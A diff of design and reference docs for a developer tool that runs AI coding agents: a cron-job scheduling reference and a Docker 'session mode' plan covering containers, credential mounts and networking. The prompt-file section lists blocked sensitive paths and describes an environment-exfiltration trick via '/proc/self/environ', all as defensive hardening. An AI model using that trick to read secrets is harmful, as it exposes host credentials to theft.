| `autoClosePreviousSession` | — | boolean (default **true**) | Recurring schedules only (ignored for `once`): when the next run fires, the still-open session created by this job's **previous** run is closed first via the normal cleanup path. See §8. |
|
||||
|
||||
**Cross-field validation** (`refineCronJob` in `schemas.ts`): the conditional
|
||||
fields above are enforced by a Zod `superRefine` on create. A missing dependent
|
||||
field (e.g. `scheduleType: "once"` with no `runAt`) is rejected with
|
||||
`INVALID_INPUT` and a field-specific message.
|
||||
|
||||
> ⚠️ **Update caveat.** `PUT /api/cron/jobs/:id` uses a `.partial()` schema that
|
||||
> does **not** re-run the cross-field `superRefine`. To keep partial edits safe,
|
||||
> `updateJob()` re-validates the **merged** job against the full `CronJobSchema`
|
||||
> and throws `400` if the result is inconsistent (e.g. switching to `once`
|
||||
> without a `runAt`). So the store is never left with a half-valid job.
|
||||
|
||||
---
|
||||
|
||||
## 4. Schedule types
|
||||
|
||||
Next-run math lives in `src/cron/cron-time.ts` (pure, unit-tested in
|
||||
`test/cron-time.test.ts`). **All wall-clock times use the server's local
|
||||
timezone** (v0.1 decision).
|
||||
|
||||
### `once`
|
||||
|
||||
- Fires a single time at the absolute `runAt` epoch-ms.
|
||||
- A **missed** one-time job (server was down at `runAt`) **still fires once** on
|
||||
the next tick — `computeNextRunAt` returns `runAt` even if it's in the past,
|
||||
until the job has fired.
|
||||
- After firing, the job **self-disables**: `completedOnce = true`, `enabled =
|
||||
false`, `nextRunAt = null`.
|
||||
|
||||
### `interval`
|
||||
|
||||
- Fires every `intervalMinutes`, computed as `fireTime + intervalMinutes`.
|
||||
- ⚠️ **Drift**: the next run re-anchors to the actual fire time, not to an ideal
|
||||
cadence — a slow tick or restart shifts subsequent runs slightly later. This is
|
||||
an accepted limitation.
|
||||
|
||||
### `daily`
|
||||
|
||||
- Fires at `dailyTime` (`HH:MM`) every day, server-local.
|
||||
- If today's time has already passed, the next run is tomorrow at that time.
|
||||
|
||||
### `weekly`
|
||||
|
||||
- Fires at `weeklyTime` on each weekday in `weeklyDays` (0 = Sunday … 6 =
|
||||
Saturday), server-local.
|
||||
- The next run is the soonest upcoming matching weekday/time within the next 7
|
||||
days.
|
||||
|
||||
---
|
||||
|
||||
## 5. Prompt source (`promptMode`)
|
||||
|
||||
### `inline_text`
|
||||
|
||||
The prompt is the literal `promptText`. Simplest option.
|
||||
|
||||
### `prompt_file_path`
|
||||
|
||||
The prompt is read from a file at fire time. **This path is security-hardened**
|
||||
because a job config is attacker-controllable and the file's contents are
|
||||
injected into an agent session (an exfiltration sink over SSE/terminal).
|
||||
`resolveSafePromptPath()` enforces, in order:
|
||||
|
||||
1. **`realpath` resolution** — symlinks are resolved to their true target, for
|
||||
the prompt file **and for `workingDir` itself**.
|
||||
2. **`workingDir` is not a trust boundary** — because it is user-supplied, the
|
||||
resolved `workingDir` is itself rejected if it is `/` or resolves into a
|
||||
blocked tree (`/etc`, `/root`, operator extras) or a pseudo-filesystem
|
||||
(`/proc`, `/sys`, `/dev`). This closes the `workingDir: '/proc'` +
|
||||
`promptFilePath: '/proc/self/environ'` env-exfil trick. The same rule is
|
||||
enforced earlier, at job create/update.
|
||||
3. **Blocklist** (defense-in-depth) — sensitive trees (`/etc`, `/root`,
|
||||
`/proc`, `/sys`, `/dev`, known secret locations) are rejected for the
|
||||
resolved prompt file.
|
||||
4. **Allowlist (primary gate)** — the resolved path **must live inside the job's
|
||||
(resolved) `workingDir`** (`validateSessionFilePath`). A symlink escaping the
|
||||
workspace fails here.
|
||||
5. **Regular-file check** — directories, FIFOs, and `/dev/*` character devices
|
||||
are rejected (they would hang or OOM an unbounded read).
|
||||
6. **Size cap** — files larger than **1 MiB** (`MAX_PROMPT_FILE_BYTES`) are
|
||||
rejected.
|
||||
7. **Single-line check** — after trailing newlines are stripped, the file
|
||||
content must be a single line (see §6).
|
||||
|
||||
If any check fails, the run is recorded as **`failed`** with the reason; no
|
||||
session is created.
|
||||
|
||||
---
|
||||
|
||||
## 6. Prompt delivery (`inputMode`)
|
||||
|
||||
Once the CLI is ready (see §8), the prompt is written to the session with a
|
||||
trailing carriage return:
|
||||
|
||||
| Mode | Mechanism | Use when |
|
||||
| ------- | --------------------------------------------------------------- | ------------------------------------------------ |
|
||||
| `typed` | `session.writeViaMux()` — tmux `send-keys -l` (literal) + Enter | Default; behaves like a human typing the prompt. |
|
||||
| `paste` | `session.write()` — writes directly to the PTY/mux | Bulk paste-style delivery. |
|
||||
|
||||
> ⚠️ **Single-line only — enforced.** Like all programmatic input in Codeman,
|
||||
> multi-line delivery would be silently corrupted (Ink-based TUIs treat a
|
||||
> newline as submit; typed mode fuses lines). So newlines are **rejected**: the
|
||||
> schema and the form refuse a multi-line `promptText`, and at fire time a
|
||||
> prompt file whose content is multi-line (after stripping trailing newlines)
|
||||
> fails the run with a clear `errorMessage`. Put multi-line instructions in a
|
||||
> file the agent is told to read itself (e.g. "read TASKS.md and do it").
|
||||
|
||||
---
|
||||
|
||||
## 7. Concurrency policy (automatic runs)
|
||||
|
||||
`concurrencyPolicy` governs what happens when a **scheduled** run is due and
|
||||
sessions of the same `agentType` already exist:
|
||||
|
||||
| Policy | Behavior |
|
||||
| ---------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
|
||||
| `warn_only` | Always launch. (The count is surfaced but not blocking.) |
|
||||
| `skip_if_same_agent_running` | If ≥ 1 **other, live** session of that mode is active, **skip** this fire — record a `skipped` run and (for recurring schedules) advance the schedule without launching. |
|
||||
|
||||
Notes on `skip_if_same_agent_running`:
|
||||
|
||||
- Only **live** sessions block: a tab whose CLI already exited (status
|
||||
`stopped`/`error`) does not count.
|
||||
- Sessions created by **this job's own previous runs never block it** —
|
||||
otherwise a recurring job would deadlock on the session it created last time
|
||||
and fire exactly once.
|
||||
- A skipped **`once`** job is **not consumed**: it stays armed and retries on
|
||||
the next tick until the blocking session goes away, then fires its single run.
|
||||
- A skip is **not** a run: it sets `lastStatus = 'skipped'` but does **not**
|
||||
advance `lastRunAt`.
|
||||
- Consecutive skips are **coalesced** — a perpetually-skipped interval job writes
|
||||
**one** skip record per streak, not one every tick, so it can't bloat
|
||||
`state.json`.
|
||||
|
||||
**Run Now ignores this policy on the server.** The browser shows a `confirm()`
|
||||
warning if same-type sessions are active, but if you proceed (or call the API
|
||||
directly), the job launches unconditionally.
|
||||
|
||||
---
|
||||
|
||||
## 8. What happens when a job fires
|
||||
|
||||
Sequence in `CronService.launch()`:
|
||||
|
||||
1. A `CronJobRun` is created with status **`created`** and broadcast
|
||||
(`cron:runCreated`).
|
||||
2. The prompt is resolved (inline or file, single-line enforced). Failure →
|
||||
**`failed`**.
|
||||
3. `workingDir` is checked (`statSync().isDirectory()`). Missing/not-a-dir →
|
||||
**`failed`**.
|
||||
4. **Auto-close previous session** (recurring schedules, unless
|
||||
`autoClosePreviousSession: false`): any still-open session created by this
|
||||
job's previous runs is closed via the normal session-cleanup path.
|
||||
5. The global session cap is checked (`MAX_CONCURRENT_SESSIONS = 50`). At cap →
|
||||
**`failed`**.
|
||||
6. A `Session` is created **with `useMux: true`** (so it runs inside tmux),
|
||||
registered, listeners attached, and started via `startInteractive()`
|
||||
(`startShell()` for `shell` mode). Model/claudeMode come from global config.
|
||||
Run status → **`session_started`**.
|
||||
7. **Readiness wait** (async, non-blocking): for non-shell agents the service
|
||||
polls the terminal buffer up to **60 × 500ms** for a `❯` prompt or the string
|
||||
`tokens`, then settles **2000ms** (`CRON_READY_SETTLE_MS`). Shell mode waits
|
||||
1000ms, then sends the optional `launchCommand` as the first input line
|
||||
(+1000ms settle).
|
||||
8. The prompt is delivered (`typed`/`paste`, trailing `\r`). Run status →
|
||||
**`prompt_sent`**; `finishedAt` stamped. Delivery failure (e.g. the mux
|
||||
session is gone) → **`failed`**.
|
||||
|
||||
The created session is a **normal, persistent interactive session** — it appears
|
||||
as its own tab and keeps running after the prompt is sent. The run's
|
||||
`createdSessionUrl` is a deep link (`/?session=<id>`); the UI focuses it
|
||||
automatically after **Run Now**.
|
||||
|
||||
> ⚠️ **Session-cap math if you disable auto-close.** With
|
||||
> `autoClosePreviousSession: false`, nothing ever closes the sessions a
|
||||
> recurring job creates — an interval job every 30 min creates 48 tabs/day and
|
||||
> hits the global 50-session cap in ~25 hours (sooner with existing tabs), after
|
||||
> which **every** fire of **every** job fails with "Maximum concurrent sessions
|
||||
> reached" until you delete tabs by hand. Leave auto-close on for unattended
|
||||
> recurring jobs, or clean up sessions yourself.
|
||||
|
||||
### The background tick
|
||||
|
||||
`tickDueJobs()` runs every **30s** (`CRON_TICK_INTERVAL`, registered in
|
||||
`server.ts`). For each enabled job whose `nextRunAt ≤ now`:
|
||||
|
||||
- **Duplicate-launch guard**: `lastDueKey = jobId:fireTime`. If this due time was
|
||||
already consumed (overlap/restart), the job is just advanced, not relaunched.
|
||||
- The schedule is **advanced _before_ launching** so a slow launch can't be
|
||||
re-triggered by the next tick.
|
||||
- On boot, `init()` recomputes `nextRunAt` for loaded jobs (dead `once` jobs stay
|
||||
dead).
|
||||
|
||||
---
|
||||
|
||||
## 9. Run history & statuses
|
||||
|
||||
Each job keeps a history of `CronJobRun` records. Statuses (`CronJobRunStatus`):
|
||||
|
||||
| Status | Meaning |
|
||||
| ----------------- | ------------------------------------------------------------- |
|
||||
| `created` | Run record created; prompt/session not yet started. |
|
||||
| `session_started` | Session launched successfully. |
|
||||
| `prompt_sent` | Prompt delivered — the happy-path terminal state. |
|
||||
| `failed` | Something went wrong (see `errorMessage`). |
|
||||
| `skipped` | A scheduled fire was skipped by `skip_if_same_agent_running`. |
|
||||
|
||||
Each run also records `triggerType` (`scheduled` or `manual_run_now`),
|
||||
`sessionId`/`sessionName`, timestamps, and `createdSessionUrl`.
|
||||
|
||||
**History is capped globally** at **500 records** (`MAX_CRON_RUN_HISTORY`); the
|
||||
oldest are pruned first. Deleting a job also deletes its run records.
|
||||
|
||||
---
|
||||
|
||||
## 10. API reference
|
||||
|
||||
All responses use the standard `ApiResponse<T>` envelope (`{success, data}` /
|
||||
`{success, error, errorCode}`). `/api/v1/*` is a stable alias.
|
||||
|
||||
| Method | Endpoint | Body | Returns |
|
||||
| -------- | ---------------------------- | ---------------------- | --------------------------------- |
|
||||
| `GET` | `/api/cron/jobs` | — | `CronJob[]` |
|
||||
| `POST` | `/api/cron/jobs` | `CronJobSchema` | `{ job }` |
|
||||
| `GET` | `/api/cron/jobs/:id` | — | `CronJob` (404 if missing) |
|
||||
| `PUT` | `/api/cron/jobs/:id` | partial `CronJob` | `{ job }` (400 if merge invalid) |
|
||||
| `DELETE` | `/api/cron/jobs/:id` | — | `{}` |
|
||||
| `PUT` | `/api/cron/jobs/:id/enabled` | `{ enabled: boolean }` | `{ job }` |
|
||||
| `POST` | `/api/cron/jobs/:id/run` | — | `{ run, activeAgents }` |
|
||||
| `GET` | `/api/cron/jobs/:id/runs` | — | `CronJobRun[]` (newest first) |
|
||||
| `GET` | `/api/cron/runs` | — | all `CronJobRun[]` (newest first) |
|
||||
|
||||
---
|
||||
|
||||
## 11. SSE events
|
||||
|
||||
Emitted on `/api/events`, mirrored in `SSE_EVENTS` (`constants.js`):
|
||||
|
||||
| Event | Payload | When |
|
||||
| ------------------ | ------------ | -------------------------------------------------------------------- |
|
||||
| `cron:jobsChanged` | `{ jobs }` | Any job created / updated / enabled / status change. |
|
||||
| `cron:jobDeleted` | `{ id }` | A job was deleted. |
|
||||
| `cron:runCreated` | `CronJobRun` | A run (incl. skips) started. |
|
||||
| `cron:runUpdated` | `CronJobRun` | A run advanced state (`session_started` / `prompt_sent` / `failed`). |
|
||||
|
||||
---
|
||||
|
||||
## 12. State & persistence
|
||||
|
||||
Persisted in `~/.codeman/state.json` via `StateStore`:
|
||||
|
||||
- `AppState.cronJobs` — map of `id → CronJob`.
|
||||
- `AppState.cronJobRuns` — map of `id → CronJobRun`.
|
||||
|
||||
Jobs and their schedules survive restarts; `init()` recomputes `nextRunAt` on
|
||||
boot. Sessions the jobs create persist through the normal session-recovery path.
|
||||
|
||||
---
|
||||
|
||||
## 13. Limits & constants
|
||||
|
||||
| Constant | Value | Source |
|
||||
| ------------------------ | --------------------- | ------------------------------------------------ |
|
||||
| Due-tick interval | 30s | `CRON_TICK_INTERVAL` (`config/server-timing.ts`) |
|
||||
| Readiness poll | 60 × 500ms | `CRON_READY_MAX_ATTEMPTS` |
|
||||
| Readiness settle | 2000ms | `CRON_READY_SETTLE_MS` |
|
||||
| Run-history cap (global) | 500 | `MAX_CRON_RUN_HISTORY` (`config/map-limits.ts`) |
|
||||
| Saved-jobs cap | 100 | `MAX_CRON_JOBS` (`config/map-limits.ts`) |
|
||||
| Concurrent-session cap | 50 | `MAX_CONCURRENT_SESSIONS` |
|
||||
| Prompt-file size cap | 1 MiB | `MAX_PROMPT_FILE_BYTES` (`cron-service.ts`) |
|
||||
| `name` length | 1–200 | `CronJobSchema` |
|
||||
| `promptText` length | ≤ 100000 | `CronJobSchema` |
|
||||
| `intervalMinutes` | 1–525600 | `CronJobSchema` |
|
||||
| `weeklyDays` | 1–7 entries, each 0–6 | `CronJobSchema` |
|
||||
|
||||
---
|
||||
|
||||
## 14. Known limitations
|
||||
|
||||
- **Server-local timezone only** — `daily`/`weekly` times are interpreted in the
|
||||
host's local time; there is no per-job timezone.
|
||||
- **Interval drift** — `interval` re-anchors to the actual fire time; long-running
|
||||
intervals slowly shift.
|
||||
- **Single-line prompts** — multi-line prompts are rejected (schema, form, and
|
||||
at fire time for prompt files); tell the agent to read a file itself for
|
||||
multi-line instructions.
|
||||
- **`runNow` / tick race** — a manual Run Now firing at the same instant as a
|
||||
scheduled tick is theoretically possible; benign (you may get two sessions).
|
||||
- **`{enabled:true}` on a dead `once` job** — re-enabling a fired one-time job
|
||||
without changing its schedule leaves it enabled-but-dead (won't fire); change
|
||||
the schedule to re-arm.
|
||||
|
||||
---
|
||||
|
||||
## 15. Troubleshooting
|
||||
|
||||
| Symptom | Likely cause | Fix |
|
||||
| ------------------------------ | ----------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------- |
|
||||
| Job never fires | Disabled, or `nextRunAt: null` | Check **Enabled**; verify the schedule fields are complete. |
|
||||
| Run shows `failed` immediately | Bad `workingDir`, prompt-file rejected, or session cap hit | Read `errorMessage` on the run; confirm the dir exists and the prompt file is inside it and < 1 MiB. |
|
||||
| Run shows `skipped` | `skip_if_same_agent_running` + another live same-type session (this job's own sessions and dead tabs don't count) | Switch to `warn_only`, or wait for the other session to end. |
|
||||
| Run fails with "single line" | Multi-line prompt text / prompt file | Keep the prompt to one line; point the agent at a file to read for long instructions. |
|
||||
| Sessions pile up between runs | `autoClosePreviousSession: false` | Re-enable auto-close, or delete old tabs before the 50-session cap bites (see §8). |
|
||||
| Wrong fire time | Timezone assumption | Times are **server-local** — check the host clock/TZ. |
|
||||
| One-time job won't re-fire | `completedOnce` set | Edit the schedule (any real schedule change re-arms it). |
|
||||
|
||||
---
|
||||
|
||||
## 16. Related docs
|
||||
|
||||
- `docs/cron-discovery.md` — architecture / integration-point analysis (why the
|
||||
feature reuses the session layer and stays distinct from `ScheduledRun`).
|
||||
- `docs/cron-build-brief.md` — the original build brief / requirements.
|
||||
- `CLAUDE.md` → **Key Patterns → Cron** — the one-paragraph engineering summary.
|
||||
- Tests: `test/cron-time.test.ts` (schedule math), `test/cron-service.test.ts`
|
||||
(CRUD, tick, concurrency, security).
|
||||
@@ -0,0 +1,433 @@
|
||||
<!-- Design doc generated via ultracode multi-agent workflow (wf_e3a7498b-26f): 3 architecture proposals -> judge panel -> synthesis -> completeness critic. -->
|
||||
|
||||
# Docker Session Mode, Implementation Plan
|
||||
|
||||
## Decisions (locked 2026-07-19, by repo owner)
|
||||
|
||||
1. **Isolation posture**: CONVENIENT default (bind-mount host `~/.claude` etc. read-write so the existing login just works; network on; still hardened non-root + cap-drop + resource caps). SEALED profile (`mountCredentials:false` + `network:none`) is a per-case opt-in.
|
||||
2. **Export**: offer BOTH full-image (`commit`+`save`+workspace tar) AND workspace-only, side by side, no default (ask each time).
|
||||
3. **Base image**: BUILD LOCALLY on first use via `scripts/build-agent-image.mjs` from a repo `docker/agent.Dockerfile`. No registry required. (GHCR pull can be added later.)
|
||||
4. **Hooks**: WIRE HOOKS NOW. Codeman scaffolds `.claude/settings.local.json` + CLAUDE.md into the linked host workspace dir (same as local cases), enabling in-container permission prompts, hook-idle detection, and the Claude Model picker.
|
||||
|
||||
Adopted defaults for the remaining open items (Section 10): resume-on-restart ON; container is per-CASE and shared by multiple sessions (killing one session only kills its in-container tmux session, never `docker stop` while siblings remain; stop/remove only on explicit teardown or case-delete); rootless caps = ship-with-warning (`capsEnforced` surfaced); remote docker daemon = local-first; podman = docker-first best-effort.
|
||||
|
||||
## Implementation status (branch `feat/docker-session-mode`)
|
||||
|
||||
DONE and END-TO-END VERIFIED against a real docker daemon (create host, link case, quick-start shell in a real container, workspace bind-mount round-trip, hook scaffolding, session-delete keeps the shared container up, case-delete `docker rm`s it):
|
||||
|
||||
- Phase 0-1: types (`DockerHost`/`DockerCase`/`SessionDocker`), `src/docker-hosts.ts` (storage, pure `buildDockerBaseArgs`/`buildDockerCreateArgs`, `containerApiUrl`, `hostGatewayAlias`, config-hash, credential-mount resolution, daemon probes), `DockerHostSchema`/`DockerCaseLinkSchema`. 26 unit tests.
|
||||
- Phase 2: `tmux-manager` `buildDockerLaunchCommand` (image-check -> ensure -> start -> exec, resume-aware), `buildDockerKillCommand` (in-container tmux only, multi-session safe), stop/remove; wired into `createSession`/`respawnPane`/`killSession`. 14 unit tests.
|
||||
- Phase 3: `Session` threading (`_docker`, toState, option builders, in-container cliVersion probe, `resolveMuxAttachCwd`), `server.ts` recovery round-trip.
|
||||
- Phase 4: `case-routes` `/api/docker-hosts` CRUD + `/api/cases/docker-link` + listing + docker-unlink; `session-routes` `/api/quick-start` docker branch (rejects per-session config, probes availability + tmux, scaffolds hooks, seeds resume id).
|
||||
- Phase 5 (partial): `docker/agent.Dockerfile` + `scripts/build-agent-image.mjs` (built + verified: node 22, tmux, claude/codex/gemini/opencode, arbitrary-uid HOME). Host-guard allowlists `host.docker.internal`/`host.containers.internal` for in-container hooks.
|
||||
- Full CI green (3445 tests).
|
||||
|
||||
REMAINING:
|
||||
|
||||
- Phase 6: export / import (`docker commit` + `save | gzip` + workspace tar + manifest; `load` + quarantined re-tag), GC / boot reaper, disk-safety prechecks, drift-recreate route, SSE `docker:*` events. THE "move to a new machine" feature.
|
||||
- Phase 7: frontend Create Case "Docker" tab + `linkDockerCase` + run wiring + case-picker labels + export/import UI.
|
||||
- Phase 8: CLAUDE.md "Docker cases" Key Pattern + `docs/docker-cases.md` + COM.
|
||||
- Deferred refinements: in-container model-picker via `settings.local.json`; live mid-run resume-id capture into `DockerCase.lastClaudeSessionId`; rootless/Desktop uid probe (currently a platform heuristic).
|
||||
|
||||
## 1. Goal & user stories
|
||||
|
||||
Add "Docker cases" to Codeman: a case can point at a container instead of a local or remote-SSH path, and any of the five CLI backends (`claude` / `shell` / `opencode` / `codex` / `gemini`) runs inside that container. It is modeled as a LOCATION OVERLAY on cases, exactly like the remote-SSH feature (COD-94/#145), never as a sixth `SessionMode`.
|
||||
|
||||
User stories:
|
||||
|
||||
- As the repo owner, I link a case to a per-project container so an autonomous Claude/Ralph run executes in a hardened sandbox (cap-drop, non-root, resource caps) instead of directly on my host, while keeping my existing OAuth login and transcript history working with zero extra setup.
|
||||
- I set default, per-case-changeable container settings (image, network mode, memory/cpu/pids caps) at link time and edit them later, and edits actually take effect through a recreate-on-drift path (see Section 4).
|
||||
- I reconnect after a Codeman restart and land back in the SAME running agent with the conversation intact. When the CONTAINER itself was stopped/rebooted/OOM-killed (which destroys the in-container tmux), the next launch RESUMES the last conversation from the bind-mounted transcript rather than starting fresh (durability model in Section 2, Key decision 1).
|
||||
- I export a finished run's whole environment (toolchain plus workspace) to a portable, secret-free `.tar.gz`, move it to another machine, and import it back into a fresh case in one click.
|
||||
- The container never accumulates: killing the session stops it, deleting the case removes it, and an instance-scoped boot reaper reaps containers whose case is gone.
|
||||
|
||||
Non-goals for the MVP: multi-tenant untrusted-code isolation guarantees (Codeman is loopback-default and single-operator, and the agent already runs `--dangerously-skip-permissions` on the host today), Kubernetes/compose orchestration, and per-command ephemeral containers.
|
||||
|
||||
## 2. Chosen architecture and why
|
||||
|
||||
The design grafts the strongest idea from each of the three proposals:
|
||||
|
||||
- Overlay-not-a-mode + faithful remote-SSH mirror (from "Docker Cases as a Location Overlay"): lowest churn, rides the existing quick-start / mux-sessions / state / recovery plumbing.
|
||||
- Convenient-but-hardened default with an opt-in sealed profile, plus exec-time name-only secret env (from "Sealed Sandbox"): a strict security improvement over today's on-host execution without the UX tax of forcing an in-container re-login.
|
||||
- One-artifact export + in-app import route (from "Container-as-Cargo"): the genuinely new, high-value capability Codeman lacks.
|
||||
|
||||
### Key decision 1: persistent per-CASE container, durable in-container tmux, AND resume-on-restart (the two-layer durability model)
|
||||
|
||||
Exactly one long-lived container per Docker case, named as a pure slug function `codeman-case-<slug>` (Docker charset `^[a-zA-Z0-9][a-zA-Z0-9_.-]+$`; Codeman already slugs case names for tmux), so create-if-missing and boot recovery are idempotent. PID1 is `sleep infinity` under `--init` (tini reaps zombies and forwards `docker stop`'s SIGTERM); the CLI is NOT the container command. The CLI runs inside a DURABLE in-container tmux on a dedicated socket `-L codeman-docker`, session `codeman-dkr-<id8>`, the direct analog of remote's `-L codeman-remote` / `codeman-ssh-<id8>`.
|
||||
|
||||
Two DIFFERENT failure surfaces need two DIFFERENT recovery layers, and conflating them is the central flaw the critic caught:
|
||||
|
||||
1. Codeman-PROCESS restart while the container stays up: the in-container tmux is still alive, so `tmux new-session -A` (attach-or-create) reattaches the SAME live agent and the paneCommand is ignored. This is the remote-SSH durability idiom and it works unchanged.
|
||||
2. CONTAINER stop / daemon restart / host reboot / OOM-kill: the in-container tmux is GONE (fresh PID1). `new-session -A` will now CREATE a fresh session and run the paneCommand, which would start a brand-new conversation. This is the case the raw plan silently lost. Because the transcript directory is bind-mounted from the host (Key decision 3), the fix is to launch with RESUME: the paneCommand becomes `exec claude --dangerously-skip-permissions --resume <claudeSessionId>` (codex uses `resume <id>`, gemini `--resume <id>`) whenever a captured `claudeSessionId` exists. The `-A` semantics make this self-selecting: the resume flag only ever executes when tmux is actually re-created, which is exactly when the live session was lost. When tmux is still alive (case 1), attach wins and the flag is inert.
|
||||
|
||||
Capturing / persisting / reusing the resume id (the missing mechanism the critic flagged): Codeman already learns `Session.claudeSessionId` from transcript correlation (which works here because projHash matches, Key decision 3) and persists it in `SessionState`. We thread that value into `createSessionOptions` / `respawnPaneOptions` for docker so `buildDockerLaunchCommand` can inject the resume flag on any relaunch. To make a NEW Codeman session (new `id8`) re-launched against the same case resume its predecessor's conversation, we ALSO persist `lastClaudeSessionId` on the `DockerCase` record; the quick-start docker branch seeds the new `Session` with it when the `dockerResumeOnStart` setting is on. First-ever launch has no id, so it starts fresh. This is user-decision 7 (default resume behavior).
|
||||
|
||||
Reconciling with stop-on-kill and with the `--restart` policy (the internal inconsistency the critic found): the container is created with `--restart no` uniformly (Codeman's idempotent create-if-missing plus boot recovery is the single recovery mechanism; a restart policy would not preserve the conversation anyway because a restarted container gets a fresh PID1/tmux). Boot recovery re-runs `buildDockerLaunchCommand` from the restored `MuxSession.docker` (`docker inspect || docker create; docker start`, then exec with resume), so a host reboot or daemon restart recreates+starts the container and resumes the conversation instead of the session vanishing. `reconcileSessions` (tmux-manager.ts ~1800-1815) must NOT hard-delete a docker session merely because no LOCAL pane exists after the local `-L codeman` server died; docker (like remote) sessions are restored from `mux-sessions.json` and relaunched. This relaunch path is explicitly part of Phase 4/Phase 3 recovery work, not assumed.
|
||||
|
||||
Why this over the alternatives: `docker exec` gets SIGHUP and dies when its client TTY closes, so a bare `docker exec claude` restarts the CLI on every reconnect/respawn. The inner tmux plus resume is what makes reconnect idempotent across BOTH failure surfaces. Because this durability is the single most important design point, tmux-in-image is a HARD gated prerequisite (`checkDockerTmuxAvailable`), never a silent fallback to bare exec. Rejected alternatives: ephemeral-per-run or bare-exec containers (no reattach durability); a literal `'docker'` `SessionMode` (touches dozens of switch/enum sites and diverges from the remote overlay precedent, since Docker is a LOCATION orthogonal to the 5 CLI backends).
|
||||
|
||||
### Key decision 2: CLI + auth delivery
|
||||
|
||||
One prebuilt base image (built once, contains NO secrets): `node:22-bookworm-slim` + `git tmux ripgrep ca-certificates`, `npm i -g @anthropic-ai/claude-code @openai/codex @google/gemini-cli opencode-ai`, an `agent` user, HOME dirs made writable by an arbitrary host uid via the OpenShift "gid 0, group-writable" convention (Key decision 6). Because the toolchain is baked, export is reproducible and needs no network at import time. The image name/namespace/registry and its refresh cadence are user-decision 2 (the `codeman/agent:base` placeholder implies a Docker Hub org the project may not own).
|
||||
|
||||
Credentials are delivered ONLY at runtime, two commit-safe channels, default convenient:
|
||||
|
||||
- OAuth/config-file CLIs (Claude Max/Pro, gcloud, opencode): bind-mount the host credential dirs read-write (`~/.claude`, `~/.codex`, `~/.gemini` + `~/.config/gcloud`, `~/.config/opencode`) so the common user "just works" with no in-container login. Because these are bind mounts, `docker commit` (which captures only the container's own writable layer, never bind mounts) physically cannot capture them, so exports stay secret-free.
|
||||
- API-key CLIs (codex/gemini): exec-time NAME-ONLY `docker exec --env OPENAI_API_KEY --env GEMINI_API_KEY ...` (no `=value`), sourced from Codeman's own process env. Only the key NAME appears in argv (no `ps` leak), and per-exec env is never captured by `docker commit`. This is the technique Codeman already uses via `tmux setenv` for the local Codex/Gemini panes, so it composes with existing machinery.
|
||||
|
||||
Per-host `DockerHost.mountCredentials` defaults `true` (convenient); setting it `false` yields a SEALED profile (no host cred mounts, in-container login only) for genuinely untrusted work. CRITICAL sealed-mode export rule (the leak the critic caught): in sealed mode the in-container login writes tokens into the container's OWN writable layer, which `docker commit` DOES capture, so a full-image export of a sealed container would ship credentials. Therefore full-image export is REFUSED for `mountCredentials:false` containers by default; the user may either take a workspace-only export (always safe) or opt into a pre-commit scrub that `docker exec`s `rm -rf ~/.claude ~/.codex ~/.gemini ~/.config/gcloud ~/.config/opencode` inside the container before commit (destructive to the in-container login, which is the point). This is enforced in the export route, not left to a manifest assertion.
|
||||
|
||||
Per-session `envOverrides` / `effort` / `codexConfig` / `geminiConfig` / `openCodeConfig` are REJECTED at quick-start exactly like the remote branch (session-routes.ts ~1698-1710). `modelOverride` is the one deliberate difference from remote: because the docker workspace is a REAL bind-mounted host dir that Codeman scaffolds (Key decision 5 and Section 6), `updateCaseModel()` can write the `model` key into `<workspace>/.claude/settings.local.json` and the in-container `claude` reads it, so the App Settings Claude Model picker works for docker cases. `effort` is a `--effort` CLI arg applied only by the local-spawn path we bypass, so it stays rejected (surfaced honestly in the UI, not silently inert). Per-mode command customization goes through `DockerHost.commands.<mode>` (`defaultDockerCommandForMode`, mirror of `defaultRemoteCommandForMode` at remote-hosts.ts:60). NEVER bake secrets into an image layer and NEVER pass a secret via create-time `-e` (both are committed).
|
||||
|
||||
Rejected alternative: sealed-by-default. For a single-operator loopback tool where the agent already runs skip-permissions on the host, forcing an in-container OAuth re-login is a UX regression with little real gain. We keep sealed as an opt-in. Rejected alternative: baking a login into the image, which leaks the instant you `docker save`.
|
||||
|
||||
### Key decision 3: workspace mount, container CWD, and transcript correlation
|
||||
|
||||
Bind-mount the host workspace dir into the container at the SAME absolute path (`dst == src`, mirror the host path), and set both `Session.workingDir` and the container workdir to that host path.
|
||||
|
||||
Two problems this solves that the raw proposals got wrong:
|
||||
|
||||
- File features: `DockerCase.hostWorkspacePath` is a REAL host directory, so `Session.workingDir = hostWorkspacePath` keeps file-routes, attachments, image-watcher, and previews working on real host bytes (unlike remote, where the path is remote-only and those features no-op). All three proposals wired `casePath = <container path>`; we deliberately diverge and use the host path.
|
||||
- Transcript correlation: Claude writes transcripts under `~/.claude/projects/<hash-of-CWD>/`. By mirroring the host path as the container CWD, the projHash computed inside the container equals the host-side hash Codeman's transcript/subagent/workflow watchers expect, so correlation keeps working (and, in turn, feeds the resume-id capture in Key decision 1). A `/workspace`-style fixed dst would break it. Mirror-vs-fixed is user-decision 3.
|
||||
|
||||
`resolveMuxAttachCwd` still returns `/tmp` for docker sessions (the LOCAL bash pane only runs `docker exec`; it never needs the workspace as its cwd), mirroring remote.
|
||||
|
||||
### Key decision 4: network default and the engine-specific host gateway
|
||||
|
||||
Default `bridge` (own netns, NAT egress, no inbound), per-case changeable to `none` (offline shell sandbox; warned because it breaks the API CLIs) or `custom` (a user-defined bridge `codeman-net-<slug>`, the chokepoint for a future egress allowlist). `host` networking and any `-p` inbound publish are structurally unrepresentable in the flag builder and schema. Rationale: every API-backed CLI (Claude, Codex, Gemini) plus npm/git needs egress, so `bridge` is the only sane functional default; `none` is reserved for `shell`.
|
||||
|
||||
The host-callback gateway alias is ENGINE-SPECIFIC (the critic's podman finding): Docker uses `host.docker.internal`, Podman uses `host.containers.internal` (Docker's alias only exists on recent podman). A helper `hostGatewayAlias(engine)` returns the right name; Section 2.5, the create args, the `CODEMAN_API_URL` rewrite, and the host-guard allowlist all consume it, and BOTH aliases are added to the allowlist so a mixed fleet keeps working.
|
||||
|
||||
### Key decision 5: hooks actually reach the host AND are actually installed
|
||||
|
||||
Two independent things must both be true for a hook to fire, and the raw plan wired only the first:
|
||||
|
||||
